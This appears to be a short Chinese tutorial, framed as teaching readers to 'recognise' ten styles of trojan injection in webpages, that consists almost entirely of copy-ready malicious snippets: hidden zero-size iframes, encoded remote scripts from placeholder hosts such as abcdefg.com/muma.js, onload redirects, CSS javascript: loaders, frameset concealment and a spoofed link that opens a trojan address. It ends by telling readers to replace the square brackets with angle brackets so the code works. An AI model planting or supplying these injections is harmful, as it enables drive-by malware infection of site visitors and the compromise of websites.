對網頁被掛馬的10種樣式的認識
以下的文章主要向大家講述的是基礎教程之教你認識網頁被掛馬的10種基本樣式,如果你對基礎教程之教你認識網頁被掛馬的10種基本樣式的技術,心存好奇的話,以下的文章將會揭開它的神秘面紗。
框架掛馬[iframe src=地址 width=0 height=0][/iframe]
網頁被掛馬的10種樣式之一:框架掛馬
[iframe src=地址 width=0 height=0][/iframe]
網頁被掛馬的10種樣式之二:js文件掛馬
首先將以下代碼 document.write("[iframe width='0' height='0' src='地址'][/iframe]");
保存為xxx.js,
則JS掛馬代碼為 [script language=javascript src=xxx.js][/script]
網頁被掛馬的10種樣式之三:js變形加密
[SCRIPT language="JScript.Encode"
src=http://www.abcdefg.com/muma.txt][/script]
muma.txt可改成任意后綴
網頁被掛馬的10種樣式之四:body掛馬
[body onload="window.location='地址';"][/body]
網頁被掛馬的10種樣式之五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML
+ '\r\n[iframe src="http://www.abcdefg.com/muma.htm/"][/iframe]';
網頁被掛馬的10種樣式之六:css中掛馬
body { background-image: url('javascript:document.write("[script
src=http://www.abcdefg.net/muma.js][/script]")')}
網頁被掛馬的10種樣式之七:JAJA掛馬
[SCRIPT language=javascript] window.open ("地址","",
"toolbar=no,location=no,
directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1"); [/script]
網頁被掛馬的10種樣式之八:圖片偽裝
[html] [iframe src="網馬地址" height=0 width=0][/iframe]
[img src="圖片地址"][/center]
[/html]
網頁被掛馬的10種樣式之九:偽裝調用:
[frameset rows="444,0" cols="*"]
[frame src="打開網頁" framborder="no" scrolling="auto" noresize
marginwidth="0"margingheight="0"]
[frame src="網馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"]
[frameset]
網頁被掛馬的10種樣式之十:高級欺騙
[a href="http://www.163.com(迷惑連接地址,顯示這個地址指向木馬地址)"
onMouseOver="www_163_com(); return true;"] 頁面要顯示的內容 [/a]
[SCRIPT Language="JavaScript"]
function www_163_com ()
{ var url="網馬地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,
status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,
width=800,height=600,left=10,top=10");
} [/SCRIPT]
以上[]得用尖括號代替
【編輯推薦】